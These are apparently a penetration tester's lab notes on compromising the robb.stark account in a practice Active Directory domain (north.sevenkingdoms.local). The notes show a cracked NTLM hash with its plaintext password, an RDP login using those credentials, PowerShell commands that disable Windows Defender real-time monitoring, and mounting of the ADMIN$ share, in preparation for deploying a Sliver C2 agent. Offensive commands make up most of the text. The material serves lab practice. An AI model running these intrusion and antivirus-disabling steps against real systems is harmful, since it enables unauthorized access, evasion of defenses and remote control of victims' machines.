## `robb.stark` - we can use `-x` on [[winterfell]] - RCE - next up, let's go through same steps to deploy a sliver agent on the remote system - do keep in mind that this fucker has windows defender enabled tho... - we can either go disable this through azure - or see if we can bypass it somehow, perhaps just using LOL techniques - Dudes got `R:W` on `ADMIN
share on the DC <3 - he's adin, we basically just rooted the freakin thing We crack da hash: ``` 831486ac7f26860c9e2f51ac91e1a07a:sexywolfy ``` We can now RDP onto the host: ``` xfreerdp /u:robb.stark /p:sexywolfy /d:north.sevenkingdoms.local /v:winterfell ``` Host has windows defender enabled, let's disable that: ``` Get-MpPreference | Select-Object -Property DisableRealtimeMonitoring # false Set-MpPreference -DisableRealtimeMonitoring $true Get-MpPreference | Select-Object -Property DisableRealtimeMonitoring # true ``` After that we'll go about downloading an additional sliver payload onto the machine. Mount dat ADMIN$ share: ```sh sudo mount -t cifs //192.168.56.22/ADMIN$ /mnt/winterfell-admin -o username=robb.stark,password=sexywolfy,domain=north.sevenkingdoms.local,vers=4.0 ```